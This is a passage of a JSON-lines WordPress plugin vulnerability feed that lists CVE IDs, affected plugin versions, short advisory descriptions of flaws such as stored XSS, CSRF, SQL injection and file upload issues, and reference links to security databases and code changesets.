ps:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-adning-advertising-plugin-actively-exploited-in-the-wild\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9873fe3-fc06-4a52-aa32-6922cab7830c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9873fe3-fc06-4a52-aa32-6922cab7830c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2079","slug":"buymeacoffee","versionImpact":"3.7","description":"The \"Buy Me a Coffee \u2013 Button and Widget Plugin\" plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the recieve_post, bmc_disconnect, name_post, and widget_post functions in versions up to, and including, 3.7. This makes it possible for unauthenticated attackers to update the plugins settings, via a forged request granted the attacker can trick a site's administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2935565%40buymeacoffee&new=2935565%40buymeacoffee&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2935565%40buymeacoffee&new=2935565%40buymeacoffee&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6309258e-e4fc-4edf-a771-2d82a9a85a5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6309258e-e4fc-4edf-a771-2d82a9a85a5c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4890","slug":"jquery-vertical-accordion-menu","versionImpact":"3.1.2","description":"The JQuery Accordion Menu Widget for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'dcwp-jquery-accordion' shortcode in versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0cf3015-cdc9-4ac9-82f3-e9b4d1203e22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0cf3015-cdc9-4ac9-82f3-e9b4d1203e22?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-vertical-accordion-menu\\\/tags\\\/3.1.2\\\/dcwp_jquery_accordion.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-vertical-accordion-menu\\\/tags\\\/3.1.2\\\/dcwp_jquery_accordion.php#L112\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-vertical-accordion-menu\\\/tags\\\/3.1.2\\\/dcwp_jquery_accordion.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-vertical-accordion-menu\\\/tags\\\/3.1.2\\\/dcwp_jquery_accordion.php#L94\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6827","slug":"essential-real-estate","versionImpact":"4.3.5","description":"The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'ajaxUploadFonts' function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bb2ce22-077b-41dd-a2ff-cc1db9d20d38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bb2ce22-077b-41dd-a2ff-cc1db9d20d38?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-real-estate\\\/tags\\\/4.3.5\\\/lib\\\/smart-framework\\\/core\\\/fonts\\\/fonts.class.php#L524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-real-estate\\\/tags\\\/4.3.5\\\/lib\\\/smart-framework\\\/core\\\/fonts\\\/fonts.class.php#L524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009780\\\/essential-real-estate\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009780\\\/essential-real-estate\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2655","slug":"contact-form-maker","versionImpact":"1.13.23","description":"The Contact Form by WD WordPress plugin through 1.13.23 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3f2d38f-8eeb-45e9-bb58-2957e416e1cd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3f2d38f-8eeb-45e9-bb58-2957e416e1cd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1362","slug":"colibri-page-builder","versionImpact":"1.0.253","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.253. This is due to missing or incorrect nonce validation on the cp_shortcode_refresh() function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5e7a994-c489-4aea-a9bb-898bc92cae4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5e7a994-c489-4aea-a9bb-898bc92cae4e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039597\\\/colibri-page-builder\\\/trunk\\\/src\\\/PageBuilder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039597\\\/colibri-page-builder\\\/trunk\\\/src\\\/PageBuilder.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1854","slug":"essential-blocks","versionImpact":"4.5.1","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blockId parameter in all versions up to, and including, 4.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86364b6f-dec8-48d8-9d2d-de1ee4901872?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86364b6f-dec8-48d8-9d2d-de1ee4901872?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041859%40essential-blocks%2Ftrunk&old=3036273%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041859%40essential-blocks%2Ftrunk&old=3036273%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0756","slug":"insert-or-embed-articulate-content-into-wordpress","versionImpact":"4.3000000023","description":"The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 lacks validation of URLs when adding iframes, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9130a42d-fca3-4f9c-ab97-d5e0a7a5cef2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9130a42d-fca3-4f9c-ab97-d5e0a7a5cef2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11199","slug":"rescue-shortcodes","versionImpact":"2.9","description":"The Rescue Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rescue_progressbar shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rescue-shortcodes\\\/tags\\\/2.9\\\/includes\\\/shortcode-functions.php#L379\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rescue-shortcodes\\\/tags\\\/2.9\\\/includes\\\/shortcode-functions.php#L379\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193428\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193428\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rescue-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rescue-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a188c615-513b-4d65-8351-d70848696297?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a188c615-513b-4d65-8351-d70848696297?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11940","slug":"property-hive-mortgage-calculator","versionImpact":"1.0.6","description":"The Property Hive Mortgage Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018price\u2019 parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property-hive-mortgage-calculator\\\/tags\\\/1.0.6\\\/propertyhive-mortgage-calculator.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property-hive-mortgage-calculator\\\/tags\\\/1.0.6\\\/propertyhive-mortgage-calculator.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property-hive-mortgage-calculator\\\/tags\\\/1.0.6\\\/templates\\\/mortgage-calculator.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property-hive-mortgage-calculator\\\/tags\\\/1.0.6\\\/templates\\\/mortgage-calculator.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202219\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202219\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/property-hive-mortgage-calculator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/property-hive-mortgage-calculator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f01f69e-0ff8-4771-9bf5-53ef78438cc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f01f69e-0ff8-4771-9bf5-53ef78438cc2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12491","slug":"simply-rets","versionImpact":"2.11.2","description":"The SimplyRETS Real Estate IDX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sr_search_form' shortcode in all versions up to, and including, 2.11.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-rets\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-rets\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5c2d05-f6cb-4f97-b174-653ad3577b02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5c2d05-f6cb-4f97-b174-653ad3577b02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0821","slug":"bit-assist","versionImpact":"1.5.2","description":"Bit Assist plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018id\u2019 parameter in all versions up to, and including, 1.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-assist\\\/tags\\\/1.5.2\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/WidgetChannelController.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-assist\\\/tags\\\/1.5.2\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/WidgetChannelController.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b64fc9d8-ea02-49e7-add1-8d83f0f41431?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b64fc9d8-ea02-49e7-add1-8d83f0f41431?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1337","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the clear_uucss_logs function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete plugin log files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a52325f9-51b5-469c-865e-73a22002d46f\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a52325f9-51b5-469c-865e-73a22002d46f\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0526","slug":"post-shortcode","versionImpact":"2.0.9","description":"The Post Shortcode WordPress plugin through 2.0.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ec58310-243d-40c8-9fa6-8753947bfa89\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ec58310-243d-40c8-9fa6-8753947bfa89\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-46889","slug":"photo-gallery","versionImpact":"1.5.69","description":"The 10Web Photo Gallery plugin through 1.5.69 for WordPress allows XSS via theme_id for bwg_frontend_data. NOTE: other parameters are covered by CVE-2021-24291, CVE-2021-25041, and CVE-2021-31693.","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/162227\\\/WordPress-Photo-Gallery-1.5.69-Cross-Site-Scripting.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/162227\\\/WordPress-Photo-Gallery-1.5.69-Cross-Site-Scripting.html\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2078","slug":"buymeacoffee","versionImpact":"3.7","description":"The \"Buy Me a Coffee \u2013 Button and Widget Plugin\" plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the recieve_post, bmc_disconnect, name_post, and widget_post functions in versions up to, and including, 3.7. This makes it possible for authenticated attackers, with minimal permissions such as subscribers, to update the plugins settings. CVE-2023-25030 may be a duplicate of this issue.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2935565%40buymeacoffee&new=2935565%40buymeacoffee&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2935565%40buymeacoffee&new=2935565%40buymeacoffee&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1c218c6-1599-4dc9-846f-e0ef74821488?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1c218c6-1599-4dc9-846f-e0ef74821488?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4887","slug":"intergeo-maps","versionImpact":"2.3.2","description":"The Google Maps Plugin by Intergeo for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'intergeo' shortcode in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intergeo-maps\\\/tags\\\/2.3.2\\\/index.php#L1146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intergeo-maps\\\/tags\\\/2.3.2\\\/index.php#L1146\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb6d11ad-0983-4a4b-b52b-824eae8b8e3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb6d11ad-0983-4a4b-b52b-824eae8b8e3c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6826","slug":"e2pdf","versionImpact":"1.20.25","description":"The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'import_action' function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03faec37-2cce-4e14-92f2-d941ab1b4ce9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03faec37-2cce-4e14-92f2-d941ab1b4ce9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/e2pdf\\\/trunk\\\/classes\\\/controller\\\/e2pdf-templates.php?rev=2993824#L753\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/e2pdf\\\/trunk\\\/classes\\\/controller\\\/e2pdf-templates.php?rev=2993824#L753\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/e2pdf\\\/trunk\\\/classes\\\/controller\\\/e2pdf-templates.php?rev=2993824#L1488\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/e2pdf\\\/trunk\\\/classes\\\/controller\\\/e2pdf-templates.php?rev=2993824#L1488\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009695\\\/e2pdf#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009695\\\/e2pdf#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1361","slug":"colibri-page-builder","versionImpact":"1.0.253","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.253. This is due to missing or incorrect nonce validation on the apiCall() function. This makes it possible for unauthenticated attackers to call a limited set of functions that can be used to import images, delete posts, or save theme data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/233a29f5-12bf-4849-9b28-4458a0b0c940?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/233a29f5-12bf-4849-9b28-4458a0b0c940?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039597\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/api\\\/api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039597\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/api\\\/api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1843","slug":"wp-auto-affiliate-links","versionImpact":"6.4.3","description":"The Auto Affiliate Links plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the aalAddLink function in all versions up to, and including, 6.4.3. This makes it possible for authenticated attackers, with subscriber access or higher, to add arbitrary links to posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09e5aa34-ab28-4349-ac5f-6a0479e641e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09e5aa34-ab28-4349-ac5f-6a0479e641e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-affiliate-links\\\/trunk\\\/aal_ajax.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-affiliate-links\\\/trunk\\\/aal_ajax.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3044067%40wp-auto-affiliate-links&new=3044067%40wp-auto-affiliate-links&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3044067%40wp-auto-affiliate-links&new=3044067%40wp-auto-affiliate-links&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3407","slug":"wp-prayer","versionImpact":"2.0.9","description":"The WP Prayer WordPress plugin through 2.0.9 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/262348ab-a335-4acf-8e4d-229fc0b4972f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/262348ab-a335-4acf-8e4d-229fc0b4972f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49852","slug":"responsive-slick-slider","versionImpact":"1.4","description":"Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Vsourz Digital Responsive Slick Slider WordPress allows Code Injection.This issue affects Responsive Slick Slider WordPress: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/responsive-slick-slider\\\/wordpress-responsive-slick-slider-wordpress-plugin-1-4-content-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/responsive-slick-slider\\\/wordpress-responsive-slick-slider-wordpress-plugin-1-4-content-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10519","slug":"wish-list-for-woocommerce","versionImpact":"7.4","description":"The Wishlist for WooCommerce: Multi Wishlists Per Customer PRO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wtab' parameter in versions 3.0.8 to 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Note: Only WordPress installations with versions of PHP <=7.4 are affected by this 